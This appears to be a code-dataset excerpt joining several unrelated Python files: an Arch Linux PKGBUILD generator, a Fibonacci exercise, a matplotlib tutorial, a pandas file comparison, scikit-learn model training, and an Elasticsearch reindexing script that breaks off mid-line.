# package in the local Arch package database with the package's name. (The\n # recipe also override this check if there's a conflicting name.)\n\n if recipe.arch.native is None:\n # Nothing explicit in the recipe; check whether there's an Arch package\n # with this name.\n native = is_native_package(package_name)\n\n elif not recipe.arch.native:\n # Recipe explicitly says the package is not native.\n native = False\n\n elif isinstance(recipe.arch.native, str):\n # Recipe explicitly says the package is native.\n native = True\n package_suffix = recipe.arch.native\n package_name = \"%s-%s\" % (prefix, package_suffix)\n\n else:\n raise BuzzyError(\"Unexpected value for arch.native in %s\" %\n recipe.recipe_name)\n\n # The Python 3 package is the default for non-Python packages that list this\n # as a dependency.\n version_tag = \"python%s\" % python_version\n if python_version == 3:\n tags = [version_tag, \"default\"]\n else:\n tags = [version_tag]\n\n # Instantiate the native or built package class.\n if native:\n return NativePackage(package_name, recipe, tags, version_tag)\n else:\n return BuiltPackage(package_name, recipe, tags, version_tag)\n\n\nclass Python(buzzy.build.python.Python):\n def create_packages(self, recipe):\n return [\n create_python_package(recipe, 3),\n create_python_package(recipe, 2),\n ]\n\n def make_pkgbuild(self, package, pkgbuild):\n python_package = package.package_name.split(\"-\")[0]\n script_suffix = python_package.replace(\"python\", \"\")\n pkgbuild.list(\"depends\").append(python_package)\n\n if self.installer == \"distutils\":\n # No extra dependencies\n pass\n elif self.installer in [\"setuptools\", \"distribute\"]:\n pkgbuild.list(\"depends\").append(\"%s-distribute\" % python_package)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, \"\"\"\n %s setup.py install --root=\"$pkgdir/\" --optimize=1\n \"\"\" % python_package)\n\n if script_suffix != \"\":\n package.append(INSTALL_STAGE, \"\"\"\n for c in \"$pkgdir/usr/bin/\"*; do\n mv \"${c}\" \"${c}%s\"\n done\n \"\"\" % script_suffix)\n\n\n#-----------------------------------------------------------------------\n# Sources\n\nclass Download(buzzy.source.download.Download):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"source\").append(self.url)\n pkgbuild.list(\"md5sums\").append(self.md5)\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CD, 'cd \"$srcdir/%s\"' % self.extracted)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_CD, 'cd \"$srcdir/%s\"' % self.extracted)\n\n\nclass Git(buzzy.source.git.Git):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"makedepends\").append(\"git\")\n\n if self.deep:\n git_args = \"\"\n else:\n git_args = '--depth 1 --branch \"%s\"' % self.commit\n\n if self.branch is None:\n self.full_commit = self.tag\n else:\n self.full_commit = \"origin/\\\"%s\\\"\" % self.branch\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_UNPACK, \"\"\"\n rm -rf \"${srcdir}/%(repo_name)s\"\n cd \"${srcdir}\"\n git clone \"\"\"+git_args+\"\"\" \"%(url)s\"\n cd \"${srcdir}/%(repo_name)s\"\n git checkout -b buzzy-build %(full_commit)s\n \"\"\", self)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_CD, 'cd \"$srcdir/%s\"' % self.repo_name)\n\n\n#-----------------------------------------------------------------------\n# Basic package metadata\n\nclass ArchPackageMetadata(object):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"arch\").append(arch)\n pkgbuild.scalar(\"pkgname\").set(package.package_name)\n pkgbuild.scalar(\"pkgver\").set(package.recipe.version)\n pkgbuild.scalar(\"pkgrel\").set(package.recipe.revision)\n pkgbuild.scalar(\"pkgdesc\").set(package.recipe.description.strip())\n pkgbuild.scalar(\"url\").set(package.recipe.url)\n\n for dep_package in package.depends:\n pkgbuild.list(\"depends\").append(dep_package.package_name)\n\n for dep_package in package.build_depends:\n pkgbuild.list(\"makedepends\").append(dep_package.package_name)\n\n\n#-----------------------------------------------------------------------\n# Licenses\n\narch_licenses = collections.defaultdict(lambda: \"custom\", {\n \"AGPL\": \"AGPL\",\n \"AGPL3\": \"AGPL3\",\n \"Apache\": \"Apache\",\n \"BSD\": \"BSD\",\n \"BSD3\": \"BSD\",\n \"GPL\": \"GPL\",\n \"GPL2\": \"GPL2\",\n \"GPL3\": \"GPL3\",\n \"LGPL\": \"LGPL\",\n \"LGPL2.1\": \"LGPL2.1\",\n \"LGPL3\": \"LGPL3\",\n \"MIT\": \"MIT\",\n \"Perl\": \"PerlArtistic\",\n \"PHP\": \"PHP\",\n \"Python\": \"Python\",\n \"Ruby\": \"RUBY\",\n \"zlib\": \"ZLIB\",\n})\n\narch_license_file_needed = [\n \"custom\",\n \"BSD\",\n \"MIT\",\n \"Python\",\n \"ZLIB\",\n]\n\nclass ArchLicenseChecker(object):\n def make_pkgbuild(self, package, pkgbuild):\n arch_license = arch_licenses[package.recipe.license]\n pkgbuild.list(\"license\").append(arch_license)\n if arch_license in arch_license_file_needed:\n if package.recipe.license_file:\n package_ = pkgbuild.code(\"package\")\n package_.append(INSTALL_POST, \"\"\"\n install -Dm644 \"%(license_file)s\" \\\\\n \"$pkgdir/usr/share/licenses/$pkgname/LICENSE\"\n \"\"\", package.recipe)\n else:\n raise BuzzyError(\"Need a license_file for %s license\" %\n arch_license)\n\n\n#-----------------------------------------------------------------------\n# OS interface\n\nclass ArchLinux(object):\n name = \"linux (arch)\"\n arch = arch\n\n @classmethod\n def detect(cls):\n if os.path.exists(\"/etc/arch-release\"):\n return cls()\n else:\n return None\n\n def __init__(self):\n # Register a bunch of crap.\n buzzy.recipe.recipe_class = Recipe\n buzzy.build.add(Autotools)\n buzzy.build.add(Cmake)\n buzzy.build.add(buzzy.build.none.NoBuild)\n buzzy.build.add(Python)\n buzzy.source.add(Download)\n buzzy.source.add(Git)\n\n def setup(self):\n # Set a PKGDEST environment variable for our makepkg calls.\n global pkgdest\n pkgdest = os.path.abspath(buzzy.config.env.repo_dir)\n buzzy.utils.makedirs(pkgdest)\n os.environ[\"PKGDEST\"] = pkgdest\n\n # And also one for the name of the packager.\n os.environ[\"PACKAGER\"] = \"%s <%s>\" % \\\n (buzzy.config.env.name, buzzy.config.env.email)\n\n # And construct the path to the repository database.\n global repo_db\n global repo_files_db\n repo_db = os.path.join(pkgdest, \"%s.db.tar.xz\" %\n buzzy.config.env.repo_name)\n repo_files_db = os.path.join(pkgdest, \"%s.files.tar.xz\" %\n buzzy.config.env.repo_name)\n\n def build(self, recipe):\n self.setup()\n recipe.build_recipe(buzzy.config.force)\n\n def install(self, recipe):\n self.setup()\n recipe.install_recipe(buzzy.config.force)\n\n def configure(self):\n pass\n","sub_path":"buzzy/distro/arch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600445582","text":"\"\"\"\nThe Fibonacci numbers, commonly denoted F(n) form a sequence, called the Fibonacci sequence, such that each number is the sum of the two preceding ones, starting from 0 and 1. That is,\n\nF(0) = 0, F(1) = 1\nF(N) = F(N - 1) + F(N - 2), for N > 1.\nGiven N, calculate F(N).\n\"\"\"\n\ndef solution(n):\n fn = [0,1]\n for i in range(2,n+1):\n fn.append(fn[i-1]+fn[i-2])\n print(fn)\n return fn[n]\n\nn = 30\nprint(solution(n))","sub_path":"daily-coding-challenge/19022020.py","file_name":"19022020.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403446719","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\n\r\n#help(\"matplotlib.pyplot.plot\") #for help\r\n#basic plotting\r\ndef plot1():\r\n\tx = np.linspace(0, 2, 100)\r\n\ty = x ** 2\r\n\tfig = plt.figure(figsize=(10, 5), dpi=100)\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8]) #add_axes([bottom x, bottom y, width, height])\r\n\tax1.plot(x, y, 'bo')\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('Example figure')\r\n\tplt.show()\r\n\r\ndef plot2():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty = np.sin(x)\r\n\tfig = plt.figure(figsize = (10, 5))\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\r\n\tax1.plot(x, y, color='g', marker='o', linestyle='-', linewidth=4, markersize=15)\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('y = sin(x)')\r\n\tplt.show()\r\n\r\n\r\ndef plot3():\r\n\tx = np.linspace(0, 2, 100)\r\n\ty = x ** 2\r\n\tfig = plt.figure(figsize=(10, 5))\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\r\n\tax1.plot(x, y, 'b')\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('Example figure')\r\n\tplt.show()\r\n\r\n\r\n#fig.savefig('output/out.png') # saving in the output directory to save\r\n# plot1()\r\n#plot2()\r\n# plot3()\r\n\r\n#multiple plots!!!\r\ndef multiple1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1) # curve 1\r\n\tplt.plot(x, y2) # curve 2 \r\n\tplt.plot(x, y1 + y2) # curve 3\r\n\tplt.show()\r\n\r\ndef multiple2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\tplt.plot(x, y1)\r\n\tplt.plot(x, y2)\r\n\tplt.plot(x, y1 + y2)\r\n\tplt.legend([\"sin(x)\", \"cos(x)\", \"sin(x) + cos(x)\"], loc=2) # legend at upper left corner\r\n\tplt.show()\r\n\r\ndef multiple3():\r\n\tplt.figure(figsize=(10, 3))\r\n\tplt.plot([1, 2, 3], [2, 4, 3], linewidth = 6)\r\n\tplt.title('very wide figure')\r\n\t#plt.savefig('output/fig1.png') # do not change, saving to output folder \r\n\tplt.figure() # new figure of default size\r\n\tplt.plot([1, 2, 3], [1, 3, 1], 'r')\r\n\tplt.title('second figure')\r\n\tplt.show()\r\n\t#plt.savefig('output/fig2.png') # do not change, saving to output folder\r\n\r\ndef multiple4():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\tfig, ax = plt.subplots()\r\n\tax.plot(x, y1)\r\n\tax.set_xlabel('x') \r\n\tax.set_ylabel('y') \r\n\tax.set_title('y = sin(x)')\r\n\tplt.show()\r\n#multiple1()\r\n#multiple2()\r\n#multiple3()\r\n#multiple4()\r\n\r\n#plotting multiple curves on the same plot\r\ndef curves1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1) # curve 1\r\n\tplt.plot(x, y2) # curve 2 \r\n\tplt.plot(x, y1 + y2) # curve 3\r\n\tplt.show()\r\n\r\ndef curves2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1)\r\n\tplt.plot(x, y2)\r\n\tplt.plot(x, y1 + y2)\r\n\tplt.legend([\"sin(x)\", \"cos(x)\", \"sin(x) + cos(x)\"], loc=2) # legend at upper left corner\r\n\tplt.show()\r\n\r\ndef curves3():\r\n\tplt.figure(figsize=(10, 3))\r\n\tplt.plot([1, 2, 3], [2, 4, 3], linewidth = 6)\r\n\tplt.title('very wide figure')\r\n\tplt.savefig('output/fig1.png') # do not change, saving to output folder \r\n\r\n\tplt.figure() # new figure of default size\r\n\tplt.plot([1, 2, 3], [1, 3, 1], 'r')\r\n\tplt.title('second figure');\r\n\tplt.savefig('output/fig2.png') # do not change, saving to output folder\r\n\tplt.show()\r\n\r\ndef curves4():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\r\n\tfig, ax = plt.subplots()\r\n\tax.plot(x, y1)\r\n\tax.set_xlabel('x') \r\n\tax.set_ylabel('y') \r\n\tax.set_title('y = sin(x)')\r\n\tplt.show()\r\n\r\n#curves1()\r\n#curves2()\r\n#curves3()\r\n#curves4()\r\n\r\ndef subplots1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tfig, ax = plt.subplots(2, 2, figsize=(9, 5)) # creates a 2x2 grid\r\n\r\n\tax[0, 0].plot(x, y1) # plots on [0, 0] block on the grid\r\n\tax[0, 0].set_title(\"sin(x)\") \r\n\r\n\tax[0, 1].plot(x, y2) # plots on the [0, 1] block on the grid \r\n\tax[0, 1].set_title(\"cos(x)\") \r\n\r\n\tax[1, 0].plot(x, y1 + y2) # plots on [1, 0] block on the grid\r\n\tax[1, 0].set_title(\"sin(x) + cos(x)\") \r\n\r\n\tax[1, 1].plot(x, y1 - y2) # plots on the [1, 1] block on the grid \r\n\tax[1, 1].set_title(\"sin(x) - cos(x)\") \r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\ndef subplots2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\tfig = plt.figure(figsize=(9, 5)) # creates a figure\r\n\t# we are using a 2x2 grid\r\n\tax1 = fig.add_subplot(221) # creates axis at index 1\r\n\tax1.plot(x, y1)\r\n\tax1.set_title(\"sinx(x)\")\r\n\r\n\tax2 = fig.add_subplot(222) # creates axis at index 2\r\n\tax2.plot(x, y2)\r\n\tax2.set_title(\"cos(x)\")\r\n\r\n\tax3 = fig.add_subplot(223) # creates axis at index 3\r\n\tax3.plot(x, y1 + y2)\r\n\tax3.set_title(\"sin(x) + cos(x)\")\r\n\r\n\tax4 = fig.add_subplot(224) # creates axis at index 4\r\n\tax4.plot(x, y1 - y2)\r\n\tax4.set_title(\"sin(x) - cos(x)\") \r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\n#subplots1()\r\n#subplots2()\r\n\r\n#setting up the axes\r\ndef axes1():\r\n\tx = np.linspace(-5, 5, 100)\r\n\tfig, axes = plt.subplots(3, 1, figsize=(8, 8))\r\n\taxes[0].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[0].set_title(\"default axes\")\r\n\r\n\taxes[1].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[1].axis('tight') \r\n\taxes[1].set_title(\"tight axes\")\r\n\r\n\taxes[2].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[2].set_ylim([-10, 10]) # setting x\r\n\taxes[2].set_xlim([-2, 2])\r\n\taxes[2].set_title(\"custom axes\");\r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\ndef logaxes():\r\n\tx = np.linspace(0, 10, 100)\r\n\ty = np.exp(2 * x)\r\n\r\n\tfig, axes = plt.subplots(1, 2, figsize=(12, 8))\r\n\r\n\taxes[0].plot(x, y)\r\n\taxes[0].set_title(\"Normal\")\r\n\r\n\taxes[1].plot(x, y)\r\n\taxes[1].set_yscale('log') # setting yscale to log\r\n\taxes[1].set_title(\"Logarithmic\")\r\n\tplt.show()\r\n\r\ndef grid():\r\n\tx = np.linspace(-10, 10, 100)\r\n\ty = x**2 + (2 * x) + 6\r\n\r\n\tfig, axes = plt.subplots(1, 2, figsize=(12, 8))\r\n\r\n\taxes[0].plot(x, y)\r\n\taxes[0].grid(True)\r\n\taxes[0].set_title(\"Deafult Grid\")\r\n\r\n\taxes[1].plot(x, y)\r\n\taxes[1].grid(color='g', linewidth=1, linestyle='dashed')\r\n\taxes[1].set_title(\"Custom Grid\")\r\n\tplt.show()\r\n\r\ndef propchange():\r\n\tx = np.linspace(-10, 10, 100)\r\n\ty = x**2 + (2 * x) + 6\r\n\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.spines['top'].set_color('r') # setting color of top spine\r\n\taxes.spines['bottom'].set_color('b') # setting color of bottom spine\r\n\taxes.spines['bottom'].set_linewidth(2) # setting linewidth of bottom spine\r\n\taxes.spines['left'].set_color('g') # setting color of left spine\r\n\taxes.plot(x, y)\r\n\tplt.show()\r\n\r\ndef twinaxes():\r\n\tt = np.linspace(0, np.pi/100, 100) # an array of time\r\n\tprint(t)\r\n\tW = 2 * np.pi * 50 # angular frequency\r\n\ttheta = np.pi/2 # phase difference\r\n\r\n\tI = 5 * np.sin(W * t) # values of current\r\n\tV = 24 * np.sin(W * t + theta) # values of voltage\r\n\r\n\tfig, axesI = plt.subplots(figsize=(12, 8))\r\n\r\n\taxesI.plot(t, I, 'r')\r\n\taxesI.set_xlabel(\"time(s)\")\r\n\taxesI.set_ylabel(\"Current(A)\", color='red')\r\n\r\n\taxesV = axesI.twinx() # instantiate a second axes that shares the same x-axis\r\n\r\n\taxesV.plot(t, V, 'b')\r\n\taxesV.set_ylabel(\"Voltage(V)\", color='blue') \r\n\tplt.show()\r\n\r\ndef ticks():\r\n\tt = np.linspace(0, 2 * np.pi, 100) \r\n\tI = 5 * np.sin(t) \r\n\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\r\n\taxes.plot(t, I, 'r')\r\n\taxes.set_xlabel(\"time(s)\")\r\n\taxes.set_ylabel(\"Current(A)\")\r\n\r\n\taxes.set_xticks(np.linspace(0, 2 * np.pi, 5)) # specifying ticks\r\n\taxes.set_xticklabels(['0', r'$0.5\\pi$', r'$\\pi$', r'$1.5\\pi$', r'$2\\pi$' ]) # custom ticks\r\n\tplt.show()\r\n\r\n#axes1()\r\n#logaxes()\r\n#grid()\r\n#propchange()\r\n#twinaxes()\r\n#ticks()\r\n\r\n#Gallery of Graphs\r\n\r\ndef pie():\r\n\tgenre = ['Drama', 'Comedy', 'Thriller', 'Sci-Fi', 'History']\r\n\tamount = [100, 25, 30, 70, 75]\r\n\tpieColor = ['MediumBlue', 'SpringGreen', 'BlueViolet'];\r\n\r\n\tplt.axis('equal')\r\n\tplt.pie(amount, labels=genre, autopct='%1.1f%%', colors=pieColor)\r\n\tplt.show()\r\n\r\ndef histogram():\r\n\tn = np.random.randn(100000)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\tplt.hist(n)\r\n\taxes.set_title(\"Histogram\")\r\n\taxes.set_xlim((min(n), max(n)))\r\n\tplt.show()\r\n\r\ndef bar():\r\n\ty = np.random.randint(low=1, high=100, size=10)\r\n\tx = np.arange(10)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.bar(x, y)\r\n\taxes.set_xticks(np.arange(10))\r\n\taxes.set_title(\"Bar Chart\")\r\n\tplt.show()\r\n\r\ndef box():\r\n\tdata1 = np.random.randint(low=1, high=100, size=50)\r\n\tdata2 = np.random.randint(low=1, high=100, size=50)\r\n\tdata = [data1, data2]\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\r\n\taxes.boxplot(data)\r\n\taxes.set_title(\"Box Plot\")\r\n\tplt.show()\r\n\r\ndef polar():\r\n\ttheta = np.linspace(0, 2 * np.pi , 100)\r\n\tr = np.sin(50 * theta) * np.cos(50 * theta) \r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, polar=True) \r\n\tax.plot(theta, r)\r\n\tplt.show()\r\n\r\ndef fillbet():\r\n\tx = np.linspace(0, 10, 100)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.fill_between(x, 2 * x**2, x**2)\r\n\tplt.show()\r\n\r\ndef scatter():\r\n\tx = np.linspace(0, 10, 100)\r\n\ty = np.random.randint(low=1, high=100, size=100) # creates a random array of 100 intergers \r\n\t # ranging from 1 - 100\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.scatter(x, y, marker='.')\r\n\tplt.show()\r\n\r\n#pie()\r\n#histogram()\r\n#bar()\r\n#box()\r\n#polar()\r\n#fillbet()\r\n#scatter()\r\n\r\n#3D Plots\r\ndef spiral(a, b, t):\r\n x = a * np.cos(t)\r\n y = a * np.sin(t)\r\n z = b * t\r\n return x, y, z\r\n\r\ndef woah():\r\n\tt = np.linspace(0, 20, 100)\r\n\tx1, y1, z1 = spiral(4, 1, t)\r\n\tx2, y2, z2 = spiral(2, 2, t)\r\n\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\tax.plot(x1, y1, z1)\r\n\tax.plot(x2, y2, z2)\r\n\tplt.show()\r\n\r\ndef func(x, y):\r\n z = np.sin(np.sqrt(x ** 2 + y ** 2))\r\n return z \r\n\r\ndef pretty():\r\n\tx = np.linspace(-6, 6, 30)\r\n\ty = np.linspace(-6, 6, 30)\r\n\tX, Y = np.meshgrid(x, y)\r\n\tZ = func(X, Y)\r\n\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\tax.plot_surface(X, Y, Z, cmap=cm.cool)\r\n\tplt.show()\r\n\r\ndef woah2():\r\n\tt = np.linspace(0, 20, 100)\r\n\tx, y, z = spiral(4, 2, t)\r\n\r\n\tfig = plt.figure()\r\n\r\n\tax1 = fig.add_subplot(121, projection='3d')\r\n\tax1.plot(x, y, z)\r\n\tax1.view_init(45, 45)\r\n\r\n\tax2 = fig.add_subplot(122, projection='3d')\r\n\tax2.plot(x, y, z, color='r')\r\n\tax1.view_init(30, 90)\r\n\tplt.show()\r\n#woah()\r\n#pretty()\r\n#woah2()\r\n\r\n#excercises\r\n#ex1- plotting temps\r\n\r\ndef temps():\r\n\tland_temp = np.array([6, 7, 8, 10, 14, 16, 18, 17, 15, 12, 11, 9])\r\n\tsea_temp = np.array([4, 5, 10, 11, 12, 16, 19, 18, 14, 10, 8, 5])\r\n\r\n\tfig, ax = plt.subplots(2, 1)\r\n\tticks = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\r\n\r\n\tx = np.linspace(0, 13, 12)\r\n\t# commands for plotting the first graph\r\n\tax[0].plot(x, land_temp, 'r', label = 'air temp')\r\n\tax[0].plot(x, sea_temp, 'b', label = 'sea temp')\r\n\tax[0].set_xticks(x) \r\n\tax[0].set_xticklabels(ticks)\r\n\tax[0].legend(loc = 'best')\r\n\tax[0].set_ylabel('temp (Celsius)')\r\n\tax[0].set_xlabel('months')\r\n\r\n\t# commands for plotting the second graph\r\n\tax[1].plot(x, land_temp - sea_temp, 'b-o')\r\n\tax[1].set_xticks(x) \r\n\tax[1].set_xticklabels(ticks)\r\n\tax[1].set_ylabel('land - sea temp (Celsius)')\r\n\tax[1].set_xlabel('months')\r\n\r\n\t# to prevent overlap in plots\r\n\tfig.tight_layout()\r\n\tplt.show()\r\n\r\ntemps()\r\n\r\n#ex 2 - plotting torus\r\n\r\n\r\n# defining function\r\ndef torus(r, R, theta, phi):\r\n x = (R + r * np.cos(theta)) * np.cos(phi)\r\n y = (R + r * np.cos(theta)) * np.sin(phi)\r\n z = r * np.sin(theta)\r\n return x, y, z\r\n\r\n# initializing values of arrays\r\ndef torus_plot():\r\n\tangle = np.linspace(0, 2 * np.pi, 100)\r\n\ttheta, phi = np.meshgrid(angle, angle)\r\n\tx, y, z = torus(1, 2, theta, phi)\r\n\r\n\t# initializing figure\r\n\tfig = plt.figure(figsize = (12, 8))\r\n\r\n\t# plotting commands for first plot\r\n\tax1 = fig.add_subplot(1, 2, 1, projection = '3d')\r\n\tax1.plot_surface(x, y, z, cmap = cm.cool)\r\n\tax1.view_init(36, 26)\r\n\tax1.set_zlim(-3, 3)\r\n\r\n\t# plotting commands for second plot\r\n\tax2 = fig.add_subplot(1, 2, 2, projection = '3d')\r\n\tax2.plot_surface(x, y, z, cmap = cm.rainbow)\r\n\tax2.view_init(15, 45)\r\n\tax2.set_zlim(-3, 3)\r\n\tplt.show()\r\n\r\ntorus_plot()\r\n\r\n","sub_path":"educative/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"320527545","text":"\n\n#calss header\nclass _CELLAR():\n\tdef __init__(self,): \n\t\tself.name = \"CELLAR\"\n\t\tself.definitions = [u'a room under the ground floor of a building, usually used for storing things']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cellar.py","file_name":"_cellar.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"654169074","text":"'''\n DataFrame.equals(self, other)\n'''\n\nimport pandas as pd\nimport time\n\nTstart1 = time.perf_counter()\nPatronsFromCsv = pd.read_csv(\"patrons.csv\")\nPatronsFromCsv.drop(['Start'], axis=1, inplace=True)\nPatronsFromCsv.drop(0, axis=0, inplace=True)\nTfinish1 = time.perf_counter()\nprint(f\"Time to load csv {Tfinish1-Tstart1}\")\n\n#print(PatronsFromCsv)\n\nTstart2 = time.perf_counter()\nPatronsFromXlsx = pd.read_excel(\"patrons.xlsx\")\nPatronsFromXlsx.drop(['Start'], axis=1, inplace=True)\nPatronsFromXlsx.drop(0, axis=0, inplace=True)\nTfinish2 = time.perf_counter()\nprint(f\"Time to load xlsx {Tfinish2-Tstart2}\")\n\n#print(PatronsFromXlsx)\n\nprint(pd.DataFrame.equals(PatronsFromCsv, PatronsFromXlsx))","sub_path":"tests/tests/import/pandasAssertEqual.py","file_name":"pandasAssertEqual.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574703650","text":"import argparse\nimport task_broker_common as tb\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--id\", required=True, help=\"specify task instance id\")\narg = parser.parse_args()\n\n\ndef exec_task(params):\n\t# dummy task\n\ttmp = 1\n\tfor a in range(50000000):\n\t\tif a > 1:\n\t\t\ttmp = tmp * a + 1\n\t\t\ttmp = tmp / a\n\tprint(' ' + str(tmp))\n\ndef main():\n\ttb.task_main_loop('aaa', arg.id, exec_task)\n\nmain()\n","sub_path":"aaa_worker.py","file_name":"aaa_worker.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"141543552","text":"from pandas import read_csv\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\nimport pickle\nimport os\n\n\ndef train_model(X, y, lda):\n \"\"\"Train the models and return a list of models.\"\"\"\n model_dict = dict() # model dictionary\n dc_model = DecisionTreeClassifier(criterion='entropy', max_depth=5, random_state=0) # decision tree classifer\n model_dict['DecisionTreeClassifier'] = dc_model # saved models\n knc_model = KNeighborsClassifier(n_neighbors=3) # KNN classifier\n model_dict['KNeighborsClassifier'] = knc_model\n svm_model = svm.SVC(C=1,kernel='linear') # SVM\n model_dict['svm'] = svm_model\n lr_model = LogisticRegression(C=30, random_state=0) # Logistic\n model_dict['LogisticRegression'] = lr_model\n for key, model in model_dict.items(): # iterate though all the model and train them\n try:\n model.fit(X,y)\n print(\"Accuracy for \" + key + \": \" + str(model.score(X,y) * 100) + \"%\")\n except:\n print(\"Error when training model: \", key)\n model_dict['lda'] = lda # save the LDA (was already trained)\n pickle.dump(model_dict,open( \"save_model.pkl\", \"wb\" )) # saved those models locally\n\n\ndef predict(file):\n \"\"\"Predict student behavior type given the file path\"\"\"\n load_data = read_csv(file, delimiter=\",\", skiprows=0) # load the csv file locally\n load_data = load_data.as_matrix()\n X = load_data[:, 2:] # retrieve input\n dir_path = os.path.dirname(os.path.realpath(__file__)) # get the current directory path\n with open(dir_path + \"/save_model.pkl\", \"rb\" ) as f: # load saved model pickle file\n saved_model = pickle.load(f)\n lda = saved_model['lda'] # get LDA model\n X = lda.transform(X) # transform X\n\n '''Change the following such that get most votes from all the models******'''\n y = saved_model['DecisionTreeClassifier'].predict(X) # predict using the first model and output\n '''**********************************************************************'''\n\n y = y.tolist()\n return y\n\n\nif __name__ == '__main__':\n dir_path = os.path.dirname(os.path.realpath(__file__)) # get the current directory path\n data = read_csv(dir_path + '/StatisticalAnalysis.csv',delimiter=\",\",skiprows = 0)\n data = data.as_matrix()\n X = data[:, 2:]\n y = data[:, 0].astype(int)\n lda = LDA(n_components=2) # dimension reduction via LDA\n lda = lda.fit(X, y)\n X = lda.transform(X)\n train_model(X, y, lda) # train models and save\n","sub_path":"intelligentHint/behaviordetection/Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102876814","text":"import click\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import scan, bulk, reindex\nimport re\nimport requests\n\n\nsettings_location = '''\n /home/svetlin/workspace/clients/ercisson/2.1/mapping/mapping.json\n '''\n\n\ndef format_date(date):\n fix_month = re.sub(r'-(\\d)-', r'-0\\1-', date)\n fix_day_and_month = re.sub(r'-(\\d)$', r'-0\\1', fix_month)\n return fix_day_and_month\n\n\ndef replace_fields_with_dots(_source):\n keys_without_dots = [e.replace('.', '') for e in _source.keys()]\n return zip(keys_without_dots, _source.values())\n\n\ndef unify_date_format(_source):\n date_fields = ['date_created', 'date_modified', 'date_prepared',\n 'date', 'date_approved']\n for date_field in date_fields:\n date_str = 